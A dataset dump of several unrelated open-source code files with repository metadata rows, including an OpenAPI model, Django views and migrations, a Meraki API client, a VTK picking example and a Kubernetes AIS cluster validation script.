float,
int,
list,
str,
none_type,
) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"value": (str,),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""DisplayType - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
Keyword Args:
value (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop("_path_to_item", ())
if "value" in kwargs:
value = kwargs.pop("value")
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments."
% (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""DisplayType - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
Keyword Args:
value (str):, must be one of ["ROADWORKS", "WEBCAM", "PARKING", "WARNING", "WEIGHT_LIMIT_35", "CLOSURE", "CLOSURE_ENTRY_EXIT", "STRONG_ELECTRIC_CHARGING_STATION", "SHORT_TERM_ROADWORKS", "ELECTRIC_CHARGING_STATION", ] # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop("_path_to_item", ())
self = super(OpenApiModel, cls).__new__(cls)
if "value" in kwargs:
value = kwargs.pop("value")
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments."
% (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self
| 42.8
| 245
| 0.565722
|
4a18a4f456978222d0e767fdd9580d91e41bc2fe
| 749
|
py
|
Python
|
project/views.py
|
rocity/token-auth-demo
|
4f74cda95656a56f14534ab01e9aa2a58d4a8aa3
|
[
"MIT"
] | null | null | null |
project/views.py
|
rocity/token-auth-demo
|
4f74cda95656a56f14534ab01e9aa2a58d4a8aa3
|
[
"MIT"
] | null | null | null |
project/views.py
|
rocity/token-auth-demo
|
4f74cda95656a56f14534ab01e9aa2a58d4a8aa3
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.contrib.auth import authenticate
from rest_framework import permissions
from rest_framework.authtoken.models import Token
from rest_framework.views import APIView
from rest_framework.response import Response
def index(request, *args):
return render(request, 'index.html')
class LoginView(APIView):
permission_classes = [permissions.AllowAny, ]
def post(self, request, *args, **kwargs):
data = request.data
user = authenticate(username=data.get('username'), password=data.get('password'))
if user:
token, _ = Token.objects.get_or_create(user=user)
return Response({'token': token.key}, status=200)
return Response(status=400)
| 28.807692
| 89
| 0.719626
|
4a18a5a607af1346aa084f6f889041c04aef1398
| 793
|
py
|
Python
|
migrations/versions/7f3f1a931278_add_tos_approved_at_to_user.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 7
|
2017-09-04T10:24:02.000Z
|
2019-12-02T13:12:30.000Z
|
migrations/versions/7f3f1a931278_add_tos_approved_at_to_user.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 140
|
2017-09-06T07:02:18.000Z
|
2022-02-26T01:26:25.000Z
|
migrations/versions/7f3f1a931278_add_tos_approved_at_to_user.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 2
|
2017-09-13T16:42:57.000Z
|
2018-02-15T15:32:40.000Z
|
"""Add 'tos_approved_at' to User.
Revision ID: 7f3f1a931278
Revises: b984311d26d7
Create Date: 2017-11-29 14:42:23.349903
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sqlalchemy as sa
from alembic import op
# Revision identifiers, used by Alembic.
revision = '7f3f1a931278'
down_revision = 'b984311d26d7'
branch_labels = None
depends_on = None
def upgrade():
"""Add 'users.tos_approved_at' column."""
with op.batch_alter_table('users', schema=None) as batch_op:
batch_op.add_column(sa.Column('tos_approved_at', sa.DateTime(), nullable=True))
def downgrade():
"""Drop 'users.tos_approved_at' column."""
with op.batch_alter_table('users', schema=None) as batch_op:
batch_op.drop_column('tos_approved_at')
| 25.580645
| 87
| 0.742749
|
4a18a66b29336cbe105ce2a8ce389b140fda4dbb
| 1,997
|
py
|
Python
|
predict.py
|
hisiter97/vietocr_hst
|
ce3567457b0c1478edbbd8914a131c30cdc91ad0
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
hisiter97/vietocr_hst
|
ce3567457b0c1478edbbd8914a131c30cdc91ad0
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
hisiter97/vietocr_hst
|
ce3567457b0c1478edbbd8914a131c30cdc91ad0
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from PIL import Image
from vietocr.tool.predictor import Predictor
from vietocr.tool.config import Cfg
import os
import time
# python predict_seq2seq.py --config logs/hw_word_seq2seq_finetuning_170k_v2/config.yml --weight logs/hw_word_seq2seq_finetuning_170k_v2/best.pt --img image
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, default='./logs/hw_word_seq2seq/config.yml')
parser.add_argument('--weight', type=str, default='./logs/hw_word_seq2seq/best.pt')
parser.add_argument('--img', type=str, default=None, required=True)
args = parser.parse_args()
config = Cfg.load_config_from_file(args.config, download_base=False)
config['weights']= args.weight
print(config.pretty_text())
detector = Predictor(config)
if os.path.isdir(args.img):
img_paths = os.listdir(args.img)
for img_path in img_paths:
try:
img = Image.open(args.img + '/' + img_path)
except:
continue
t1 = time.time()
s, prob = detector.predict(img, return_prob=True)
print('Text in {} is:\t {} | prob: {:.2f} | times: {:.2f}'.format(img_path, s, prob, time.time() - t1))
else:
t1 = time.time()
img = Image.open(args.img)
s, prob = detector.predict(img, return_prob=True)
print('Text in {} is:\t {} | prob: {:.2f} | times: {:.2f}'.format(args.img, s, prob, time.time() - t1))
def predict_file():
config_path = './logs/hw_word_seq2seq/config.yml'
config = Cfg.load_config_from_file(config_path, download_base=False)
config['weights']= './logs/hw_word_seq2seq_finetuning/best.pt'
print(config.pretty_text())
detector = Predictor(config)
detector.gen_annotations('./DATA/data_verifier/hw_word_15k_labels.txt', './DATA/data_verifier/hw_word_15k_labels_preds.txt', data_root='./DATA/data_verifier')
if __name__ == '__main__':
main()
# predict_file()
| 35.035088
| 162
| 0.664497
|
4a18a6ab4cce67f35a5b14cf60dc5cbd747a165b
| 601
|
py
|
Python
|
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/numtrees_400/rule_63.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/numtrees_400/rule_63.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/numtrees_400/rule_63.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
def findDecision(obj): #obj[0]: Driving_to, obj[1]: Passanger, obj[2]: Weather, obj[3]: Temperature, obj[4]: Time, obj[5]: Coupon, obj[6]: Coupon_validity, obj[7]: Gender, obj[8]: Age, obj[9]: Maritalstatus, obj[10]: Children, obj[11]: Education, obj[12]: Occupation, obj[13]: Income, obj[14]: Bar, obj[15]: Coffeehouse, obj[16]: Carryaway, obj[17]: Restaurantlessthan20, obj[18]: Restaurant20to50, obj[19]: Direction_same, obj[20]: Distance
# {"feature": "Age", "instances": 3, "metric_value": 0.9183, "depth": 1}
if obj[8]<=1:
return 'False'
elif obj[8]>1:
return 'True'
else: return 'True'
| 75.125
| 441
| 0.673877
|
4a18a6d316f050d5bea5eb2e112365946cab0c4a
| 438
|
py
|
Python
|
src/pretalx/event/migrations/0025_event_featured_sessions_text.py
|
lili668668/pretalx
|
5ba2185ffd7c5f95254aafe25ad3de340a86eadb
|
[
"Apache-2.0"
] | 418
|
2017-10-05T05:52:49.000Z
|
2022-03-24T09:50:06.000Z
|
src/pretalx/event/migrations/0025_event_featured_sessions_text.py
|
lili668668/pretalx
|
5ba2185ffd7c5f95254aafe25ad3de340a86eadb
|
[
"Apache-2.0"
] | 1,049
|
2017-09-16T09:34:55.000Z
|
2022-03-23T16:13:04.000Z
|
src/pretalx/event/migrations/0025_event_featured_sessions_text.py
|
lili668668/pretalx
|
5ba2185ffd7c5f95254aafe25ad3de340a86eadb
|
[
"Apache-2.0"
] | 155
|
2017-10-16T18:32:01.000Z
|
2022-03-15T12:48:33.000Z
|
# Generated by Django 3.1.4 on 2020-12-13 23:27
from django.db import migrations
import i18nfield.fields
class Migration(migrations.Migration):
dependencies = [
("event", "0024_remove_team_review_override_votes"),
]
operations = [
migrations.AddField(
model_name="event",
name="featured_sessions_text",
field=i18nfield.fields.I18nTextField(null=True),
),
]
| 21.9
| 60
| 0.641553
|
4a18a6f27874470db17d86c7136f3e2e3bed1715
| 662
|
py
|
Python
|
setup.py
|
cinchio/tap-rockgympro
|
aaf55111e40a74708639363cea6198f5e70eeeaf
|
[
"Apache-2.0"
] | 1
|
2021-09-07T09:29:42.000Z
|
2021-09-07T09:29:42.000Z
|
setup.py
|
cinchio/tap-rockgympro
|
aaf55111e40a74708639363cea6198f5e70eeeaf
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
cinchio/tap-rockgympro
|
aaf55111e40a74708639363cea6198f5e70eeeaf
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name="tap-rockgympro",
version="0.1.12",
description="Singer.io tap for extracting RockGymPro data",
author="Cinch",
url="https://github.com/cinchio/tap-rockgympro",
python_requires='>=3.6.0',
py_modules=["tap_rockgympro"],
install_requires=[
"singer-python==5.12.1"
],
entry_points="""
[console_scripts]
tap-rockgympro=tap_rockgympro:main
""",
packages=find_packages(include=['tap_rockgympro', 'tap_rockgympro.*']),
package_data = {
"tap_rockgympro": ["schemas/*.json"]
},
include_package_data=True,
)
| 25.461538
| 75
| 0.652568
|
4a18a872418974b52f171ee850e95b0eea4b0dec
| 9,621
|
py
|
Python
|
meraki/api/organizations.py
|
NoFliesOnYou/dashboard-api-python
|
3185d0e8a9a38eba9127ac640dcbb02444e7adf2
|
[
"MIT"
] | null | null | null |
meraki/api/organizations.py
|
NoFliesOnYou/dashboard-api-python
|
3185d0e8a9a38eba9127ac640dcbb02444e7adf2
|
[
"MIT"
] | 3
|
2020-11-08T08:50:59.000Z
|
2021-12-13T20:47:15.000Z
|
flask/meraki/api/organizations.py
|
cyberdevnet/mer-hacker
|
a7dddd03c5b02a2f8c84d711b69868d2b94f1f99
|
[
"MIT"
] | null | null | null |
class Organizations(object):
def __init__(self, session):
super(Organizations, self).__init__()
self._session = session
def getOrganizations(self):
"""
**List the organizations that the user has privileges on**
https://developer.cisco.com/meraki/api/#!get-organizations
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizations',
}
resource = f'/organizations'
return self._session.get(metadata, resource)
def createOrganization(self, name: str):
"""
**Create a new organization**
https://developer.cisco.com/meraki/api/#!create-organization
- name (string): The name of the organization
"""
kwargs = locals()
metadata = {
'tags': ['Organizations'],
'operation': 'createOrganization',
}
resource = f'/organizations'
body_params = ['name']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.post(metadata, resource, payload)
def getOrganization(self, organizationId: str):
"""
**Return an organization**
https://developer.cisco.com/meraki/api/#!get-organization
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganization',
}
resource = f'/organizations/{organizationId}'
return self._session.get(metadata, resource)
def updateOrganization(self, organizationId: str, **kwargs):
"""
**Update an organization**
https://developer.cisco.com/meraki/api/#!update-organization
- organizationId (string)
- name (string): The name of the organization
"""
kwargs.update(locals())
metadata = {
'tags': ['Organizations'],
'operation': 'updateOrganization',
}
resource = f'/organizations/{organizationId}'
body_params = ['name']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.put(metadata, resource, payload)
def deleteOrganization(self, organizationId: str):
"""
**Delete an organization**
https://developer.cisco.com/meraki/api/#!delete-organization
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'deleteOrganization',
}
resource = f'/organizations/{organizationId}'
return self._session.delete(metadata, resource)
def claimIntoOrganization(self, organizationId: str, **kwargs):
"""
**Claim a list of devices, licenses, and/or orders into an organization. When claiming by order, all devices and licenses in the order will be claimed; licenses will be added to the organization and devices will be placed in the organization's inventory.**
https://developer.cisco.com/meraki/api/#!claim-into-organization
- organizationId (string)
- orders (array): The numbers of the orders that should be claimed
- serials (array): The serials of the devices that should be claimed
- licenses (array): The licenses that should be claimed
"""
kwargs.update(locals())
metadata = {
'tags': ['Organizations'],
'operation': 'claimIntoOrganization',
}
resource = f'/organizations/{organizationId}/claim'
body_params = ['orders', 'serials', 'licenses']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.post(metadata, resource, payload)
def cloneOrganization(self, organizationId: str, name: str):
"""
**Create a new organization by cloning the addressed organization**
https://developer.cisco.com/meraki/api/#!clone-organization
- organizationId (string)
- name (string): The name of the new organization
"""
kwargs = locals()
metadata = {
'tags': ['Organizations'],
'operation': 'cloneOrganization',
}
resource = f'/organizations/{organizationId}/clone'
body_params = ['name']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.post(metadata, resource, payload)
def getOrganizationDeviceStatuses(self, organizationId: str):
"""
**List the status of every Meraki device in the organization**
https://developer.cisco.com/meraki/api/#!get-organization-device-statuses
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationDeviceStatuses',
}
resource = f'/organizations/{organizationId}/deviceStatuses'
return self._session.get(metadata, resource)
def getOrganizationInventory(self, organizationId: str, **kwargs):
"""
**Return the inventory for an organization**
https://developer.cisco.com/meraki/api/#!get-organization-inventory
- organizationId (string)
- includeLicenseInfo (boolean): When this parameter is true, each entity in the response will include the license expiration date of the device (if any). Only applies to organizations that support per-device licensing. Defaults to false.
"""
kwargs.update(locals())
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationInventory',
}
resource = f'/organizations/{organizationId}/inventory'
query_params = ['includeLicenseInfo']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get(metadata, resource, params)
def getOrganizationLicenseState(self, organizationId: str):
"""
**Return an overview of the license state for an organization**
https://developer.cisco.com/meraki/api/#!get-organization-license-state
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationLicenseState',
}
resource = f'/organizations/{organizationId}/licenseState'
return self._session.get(metadata, resource)
def getOrganizationThirdPartyVPNPeers(self, organizationId: str):
"""
**Return the third party VPN peers for an organization**
https://developer.cisco.com/meraki/api/#!get-organization-third-party-v-p-n-peers
- organizationId (string)
"""
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationThirdPartyVPNPeers',
}
resource = f'/organizations/{organizationId}/thirdPartyVPNPeers'
return self._session.get(metadata, resource)
def updateOrganizationThirdPartyVPNPeers(self, organizationId: str, peers: list):
"""
**Update the third party VPN peers for an organization**
https://developer.cisco.com/meraki/api/#!update-organization-third-party-v-p-n-peers
- organizationId (string)
- peers (array): The list of VPN peers
"""
kwargs = locals()
metadata = {
'tags': ['Organizations'],
'operation': 'updateOrganizationThirdPartyVPNPeers',
}
resource = f'/organizations/{organizationId}/thirdPartyVPNPeers'
body_params = ['peers']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return self._session.put(metadata, resource, payload)
def getOrganizationUplinksLossAndLatency(self, organizationId: str, **kwargs):
"""
**Return the uplink loss and latency for every MX in the organization from at latest 2 minutes ago**
https://developer.cisco.com/meraki/api/#!get-organization-uplinks-loss-and-latency
- organizationId (string)
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 365 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 5 minutes after t0. The latest possible time that t1 can be is 2 minutes into the past.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 5 minutes. The default is 5 minutes.
- uplink (string): Optional filter for a specific WAN uplink. Valid uplinks are wan1, wan2, cellular. Default will return all uplinks.
- ip (string): Optional filter for a specific destination IP. Default will return all destination IPs.
"""
kwargs.update(locals())
if 'uplink' in kwargs:
options = ['wan1', 'wan2', 'cellular']
assert kwargs['uplink'] in options, f'''"uplink" cannot be "{kwargs['uplink']}", & must be set to one of: {options}'''
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationUplinksLossAndLatency',
}
resource = f'/organizations/{organizationId}/uplinksLossAndLatency'
query_params = ['t0', 't1', 'timespan', 'uplink', 'ip']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get(metadata, resource, params)
| 36.443182
| 264
| 0.613138
|
4a18a8d3c4414bcd820dd8941ebaba8963026ebd
| 4,220
|
py
|
Python
|
src/Python/Picking/HighlightPickedActor.py
|
ajpmaclean/vtk-examples
|
1a55fc8c6af67a3c07791807c7d1ec0ab97607a2
|
[
"Apache-2.0"
] | 81
|
2020-08-10T01:44:30.000Z
|
2022-03-23T06:46:36.000Z
|
src/Python/Picking/HighlightPickedActor.py
|
ajpmaclean/vtk-examples
|
1a55fc8c6af67a3c07791807c7d1ec0ab97607a2
|
[
"Apache-2.0"
] | 2
|
2020-09-12T17:33:52.000Z
|
2021-04-15T17:33:09.000Z
|
src/Python/Picking/HighlightPickedActor.py
|
ajpmaclean/vtk-examples
|
1a55fc8c6af67a3c07791807c7d1ec0ab97607a2
|
[
"Apache-2.0"
] | 27
|
2020-08-17T07:09:30.000Z
|
2022-02-15T03:44:58.000Z
|
#!/usr/bin/env python
# noinspection PyUnresolvedReferences
import vtkmodules.vtkRenderingOpenGL2
from vtkmodules.vtkCommonColor import vtkNamedColors
from vtkmodules.vtkCommonCore import vtkMinimalStandardRandomSequence
from vtkmodules.vtkFiltersSources import vtkSphereSource
from vtkmodules.vtkInteractionStyle import vtkInteractorStyleTrackballCamera
from vtkmodules.vtkRenderingCore import (
vtkActor,
vtkPolyDataMapper,
vtkPropPicker,
vtkProperty,
vtkRenderWindow,
vtkRenderWindowInteractor,
vtkRenderer
)
colors = vtkNamedColors()
NUMBER_OF_SPHERES = 10
class MouseInteractorHighLightActor(vtkInteractorStyleTrackballCamera):
def __init__(self, parent=None):
self.AddObserver("LeftButtonPressEvent", self.leftButtonPressEvent)
self.LastPickedActor = None
self.LastPickedProperty = vtkProperty()
def leftButtonPressEvent(self, obj, event):
clickPos = self.GetInteractor().GetEventPosition()
picker = vtkPropPicker()
picker.Pick(clickPos[0], clickPos[1], 0, self.GetDefaultRenderer())
# get the new
self.NewPickedActor = picker.GetActor()
# If something was selected
if self.NewPickedActor:
# If we picked something before, reset its property
if self.LastPickedActor:
self.LastPickedActor.GetProperty().DeepCopy(self.LastPickedProperty)
# Save the property of the picked actor so that we can
# restore it next time
self.LastPickedProperty.DeepCopy(self.NewPickedActor.GetProperty())
# Highlight the picked actor by changing its properties
self.NewPickedActor.GetProperty().SetColor(colors.GetColor3d('Red'))
self.NewPickedActor.GetProperty().SetDiffuse(1.0)
self.NewPickedActor.GetProperty().SetSpecular(0.0)
self.NewPickedActor.GetProperty().EdgeVisibilityOn()
# save the last picked actor
self.LastPickedActor = self.NewPickedActor
self.OnLeftButtonDown()
return
def main():
# A renderer and render window
renderer = vtkRenderer()
renderer.SetBackground(colors.GetColor3d('SteelBlue'))
renwin = vtkRenderWindow()
renwin.AddRenderer(renderer)
renwin.SetSize(640, 480)
renwin.SetWindowName('HighlightPickedActor')
# An interactor
interactor = vtkRenderWindowInteractor()
interactor.SetRenderWindow(renwin)
# add the custom style
style = MouseInteractorHighLightActor()
style.SetDefaultRenderer(renderer)
interactor.SetInteractorStyle(style)
randomSequence = vtkMinimalStandardRandomSequence()
# randomSequence.SetSeed(1043618065)
# randomSequence.SetSeed(5170)
randomSequence.SetSeed(8775070)
# Add spheres to play with
for i in range(NUMBER_OF_SPHERES):
source = vtkSphereSource()
# random position and radius
x = randomSequence.GetRangeValue(-5.0, 5.0)
randomSequence.Next()
y = randomSequence.GetRangeValue(-5.0, 5.0)
randomSequence.Next()
z = randomSequence.GetRangeValue(-5.0, 5.0)
randomSequence.Next()
radius = randomSequence.GetRangeValue(0.5, 1.0)
randomSequence.Next()
source.SetRadius(radius)
source.SetCenter(x, y, z)
source.SetPhiResolution(11)
source.SetThetaResolution(21)
mapper = vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtkActor()
actor.SetMapper(mapper)
r = randomSequence.GetRangeValue(0.4, 1.0)
randomSequence.Next()
g = randomSequence.GetRangeValue(0.4, 1.0)
randomSequence.Next()
b = randomSequence.GetRangeValue(0.4, 1.0)
randomSequence.Next()
actor.GetProperty().SetDiffuseColor(r, g, b)
actor.GetProperty().SetDiffuse(.8)
actor.GetProperty().SetSpecular(.5)
actor.GetProperty().SetSpecularColor(colors.GetColor3d('White'))
actor.GetProperty().SetSpecularPower(30.0)
renderer.AddActor(actor)
# Start
interactor.Initialize()
renwin.Render()
interactor.Start()
if __name__ == '__main__':
main()
| 31.969697
| 84
| 0.691232
|
4a18a927fc191f06f51717c8b60f0178c7a83c76
| 16,213
|
py
|
Python
|
deploy/prod/k8s/utils/ais_k8s.py
|
eef808a24ff/aistore
|
de1e97c34aaa28acd2db60e23216526f546c5b5f
|
[
"MIT"
] | 1
|
2020-05-20T23:43:38.000Z
|
2020-05-20T23:43:38.000Z
|
deploy/prod/k8s/utils/ais_k8s.py
|
eef808a24ff/aistore
|
de1e97c34aaa28acd2db60e23216526f546c5b5f
|
[
"MIT"
] | null | null | null |
deploy/prod/k8s/utils/ais_k8s.py
|
eef808a24ff/aistore
|
de1e97c34aaa28acd2db60e23216526f546c5b5f
|
[
"MIT"
] | 1
|
2021-01-12T15:06:40.000Z
|
2021-01-12T15:06:40.000Z
|
#
# Run with python2 - a requirement of the AIS ais_client
#
# Python script to query/validate AIS cluster state & health on k8s as deployed
# by our Helm chart.
#
# This scripts uses hard-coded knowledge of labels etc that are used/expected by
# the AIS helm chart. It should instead query those labels from the DaemonSets
# in use, and learn dynamically.
#
# Because this script needs to contact the individual daemon endpoints, it must be
# run on a k8s cluster node or from within a pod in the cluster.
#
# This script uses the ~/.kube/config mechanism for authentication.
#
# pylint: disable=unused-variable
from __future__ import print_function
import ais_client
import datetime, os, sys, threading
import ptvsd
import pytz
from kubernetes import client, config
from operator import attrgetter
from urllib3.exceptions import MaxRetryError, NewConnectionError
if os.getenv('REMOTE_DEBUG_LOCAL_IP'):
ptvsd.enable_attach(address=(os.getenv('REMOTE_DEBUG_LOCAL_IP'), os.getenv('REMOTE_DEBUG_LOCAL_PORT')), redirect_output=True)
ptvsd.wait_for_attach()
class Ais:
"""Kitchen sink class for AIS validation on k8s
"""
appname = "ais"
#
# Proxy clusterIP service selector
#
proxySvcLabel = "app=ais"
def __init__(self, relname):
""" Load current kube config context and initialize API handles we require. """
config.load_kube_config()
self.relname = relname
self.v1api = client.CoreV1Api()
#
# Node label selectors
#
self.nodeProxyLabel = 'nvidia.com/ais-proxy=%s-%s-electable' % (relname, self.appname)
self.nodeNeProxyLabel = 'nvidia.com/ais-proxy=%s-%s-nonelectable' % (relname, self.appname)
self.nodeTargetLabel = 'nvidia.com/ais-target=%s-%s' % (relname, self.appname)
#
# Pod label selectors
#
self.podProxyLabel = "release=%s,app=ais,component=proxy" % relname
self.podNeProxyLabel = "release=%s,app=ais,component=ne_proxy" % relname
self.podTargetLabel = "release=%s,app=ais,component=target" % relname
self.refreshAisK8sState()
self.refreshAisDaemonState()
def refreshAisK8sState(self, quiet=False):
""" Query k8s for AIS state. """
#
# Load nodes labeled as per nodeSelectors for proxy, ne-proxy, target
#
if not quiet:
print("Querying AIS k8s cluster nodes ...")
self.nodes_proxy = sorted(self.v1api.list_node(label_selector=self.nodeProxyLabel).items, key=attrgetter('metadata.name'))
self.nodes_neproxy = sorted(self.v1api.list_node(label_selector=self.nodeNeProxyLabel).items, key=attrgetter('metadata.name'))
self.nodes_target = sorted(self.v1api.list_node(label_selector=self.nodeTargetLabel).items, key=attrgetter('metadata.name'))
#
# Look for node labeled as initial primary proxy
#
for node in self.nodes_proxy:
if node.metadata.labels.get(u'nvidia.com/ais-initial-primary-proxy', None) == self.relname:
self.initialPrimaryNodeName = node.metadata.name
break
else:
self.initialPrimaryNodeName = None
#
# Load pods with our labels, allowing for uninitialized pods
#
if not quiet:
print("Querying AIS k8s pods ...")
proxy_pods = sorted(
self.v1api.list_pod_for_all_namespaces(label_selector=self.podProxyLabel, include_uninitialized=True).items,
key=attrgetter('spec.node_name')
)
ne_proxy_pods = sorted(
self.v1api.list_pod_for_all_namespaces(label_selector=self.podNeProxyLabel, include_uninitialized=True).items,
key=attrgetter('spec.node_name')
)
target_pods = sorted(
self.v1api.list_pod_for_all_namespaces(label_selector=self.podTargetLabel, include_uninitialized=True).items,
key=attrgetter('spec.node_name')
)
#
# Each AIS Daemon will have a dict in one of the three lists:
# {
